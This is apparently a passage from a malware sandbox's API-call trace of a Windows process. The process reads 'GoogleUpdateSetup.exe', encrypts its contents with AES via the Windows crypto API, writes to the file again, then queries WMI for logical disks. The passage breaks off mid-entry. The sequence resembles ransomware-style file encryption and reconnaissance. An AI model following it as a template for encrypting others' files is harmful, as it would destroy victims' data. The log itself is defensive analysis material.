lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), fInfoLevelId=0x0, lpFileInformation=0x372b670 | out: lpFileInformation=0x372b670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58)) returned 1 [0153.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0153.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0xa0 [0153.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0153.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0153.699] GetFileType (hFile=0x45c) returned 0x1 [0153.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0153.699] GetFileType (hFile=0x45c) returned 0x1 [0153.699] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x113f58 [0153.700] ReadFile (in: hFile=0x45c, lpBuffer=0x514b508, nNumberOfBytesToRead=0x113f58, lpNumberOfBytesRead=0x949ea9c, lpOverlapped=0x0 | out: lpBuffer=0x514b508*, lpNumberOfBytesRead=0x949ea9c*=0x113f58, lpOverlapped=0x0) returned 1 [0154.022] CloseHandle (hObject=0x45c) returned 1 [0154.022] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0xbdfbf0) returned 1 [0154.023] CryptGenRandom (in: hProv=0xbdfbf0, dwLen=0x10, pbBuffer=0x374ef74 | out: pbBuffer=0x374ef74) returned 1 [0155.513] CryptImportKey (in: hProv=0xbdfbf0, pbData=0x36047ec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7fd10) returned 1 [0155.513] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0155.513] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0155.513] CryptDuplicateKey (in: hKey=0xb7fd10, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7fa90) returned 1 [0155.513] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0155.513] CryptSetKeyParam (hKey=0xb7fa90, dwParam=0x4, pbData=0x36048cc*=0x1, dwFlags=0x0) returned 1 [0155.513] CryptSetKeyParam (hKey=0xb7fa90, dwParam=0x1, pbData=0x3604898, dwFlags=0x0) returned 1 [0155.521] CryptEncrypt (in: hKey=0xb7fa90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5392c10*, pdwDataLen=0x949ea68*=0x113f60, dwBufLen=0x113f60 | out: pbData=0x5392c10*, pdwDataLen=0x949ea68*=0x113f60) returned 1 [0155.533] CryptEncrypt (in: hKey=0xb7fa90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36048f4*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x36048f4*, pdwDataLen=0x949ea70*=0x10) returned 1 [0156.190] CryptDestroyKey (hKey=0xb7fd10) returned 1 [0156.190] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0156.190] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0156.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0xa0 [0156.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0156.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0156.191] GetFileType (hFile=0x31c) returned 0x1 [0156.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0156.191] GetFileType (hFile=0x31c) returned 0x1 [0156.191] WriteFile (in: hFile=0x31c, lpBuffer=0x3698b28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x3698b28*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0156.192] CloseHandle (hObject=0x31c) returned 1 [0156.192] CoTaskMemAlloc (cb=0x20c) returned 0x66cc4b0 [0156.192] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cc4b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0156.193] CoTaskMemFree (pv=0x66cc4b0) [0156.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.193] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0156.193] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0156.193] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0156.193] IUnknown:Release (This=0xb51e34) returned 0x1 [0156.194] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x6024ac0) returned 0x0 [0156.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024ac0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0156.194] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024ac0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x6025f40) returned 0x0 [0156.194] WbemDefPath:IUnknown:Release (This=0x6024ac0) returned 0x0 [0156.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025f40, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x6025f40) returned 0x0 [0156.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025f40, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0156.194] WbemDefPath:IUnknown:AddRef (This=0x6025f40) returned 0x3 [0156.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025f40, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0156.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025f40, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0156.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025f40, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0x66ccc18) returned 0x0 [0156.194] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0156.194] WbemDefPath:IUnknown:Release (This=0x66ccc18) returned 0x3 [0156.195] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0156.195] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0156.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025f40, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0156.195] WbemDefPath:IUnknown:Release (This=0x6025f40) returned 0x2 [0156.195] WbemDefPath:IUnknown:Release (This=0x6025f40) returned 0x1 [0156.195] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0156.195] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0156.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025f40, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x6025f40) returned 0x0 [0156.195] WbemDefPath:IUnknown:AddRef (This=0x6025f40) returned 0x3 [0156.195] WbemDefPath:IUnknown:Release (This=0x6025f40) returned 0x2 [0156.195] WbemDefPath:IWbemPath:SetText (This=0x6025f40, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025f40, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetText (in: This=0x6025f40, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetText (in: This=0x6025f40, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025f40, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025f40, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025f40, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025f40, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025f40, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0156.195] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0156.195] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0156.195] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0156.195] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0156.196] IUnknown:Release (This=0xb51e34) returned 0x1 [0156.196] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x6024b70) returned 0x0 [0156.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024b70, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0156.196] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024b70, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x6025fb0) returned 0x0 [0156.196] WbemDefPath:IUnknown:Release (This=0x6024b70) returned 0x0 [0156.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025fb0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x6025fb0) returned 0x0 [0156.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025fb0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0156.197] WbemDefPath:IUnknown:AddRef (This=0x6025fb0) returned 0x3 [0156.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025fb0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0156.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025fb0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 [0156.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025fb0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0x66ccd68) returned 0x0 [0156.197] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccd68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0156.197] WbemDefPath:IUnknown:Release (This=0x66ccd68) returned 0x3 [0156.197] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0156.197] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0156.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025fb0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0156.197] WbemDefPath:IUnknown:Release (This=0x6025fb0) returned 0x2 [0156.197] WbemDefPath:IUnknown:Release (This=0x6025fb0) returned 0x1 [0156.197] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0156.197] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0156.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025fb0, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x6025fb0) returned 0x0 [0156.197] WbemDefPath:IUnknown:AddRef (This=0x6025fb0) returned 0x3 [0156.197] WbemDefPath:IUnknown:Release (This=0x6025fb0) returned 0x2 [0156.197] WbemDefPath:IWbemPath:SetText (This=0x6025fb0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0156.197] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025fb0, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0156.197] WbemDefPath:IWbemPath:GetText (in: This=0x6025fb0, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0156.198] WbemDefPath:IWbemPath:GetText (in: This=0x6025fb0, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0156.198] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0156.198] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: pAptType=0x949e978*=1) returned 0x0 [0156.198] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0156.198] IUnknown:Release (This=0xb51e34) returned 0x1 [0156.198] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x60274e0) returned 0x0 [0156.198] WbemLocator:IUnknown:QueryInterface (in: This=0x60274e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0156.198] WbemLocator:IClassFactory:CreateInstance (in: This=0x60274e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x6024b80) returned 0x0 [0156.199] WbemLocator:IUnknown:Release (This=0x60274e0) returned 0x0 [0156.199] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x6024b80) returned 0x0 [0156.199] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0156.199] WbemLocator:IUnknown:AddRef (This=0x6024b80) returned 0x3 [0156.199] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0156.199] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0156.199] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0156.199] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0156.199] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0156.199] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0156.199] WbemLocator:IUnknown:Release (This=0x6024b80) returned 0x2 [0156.199] WbemLocator:IUnknown:Release (This=0x6024b80) returned 0x1 [0156.199] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0156.199] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0156.199] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b80, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, 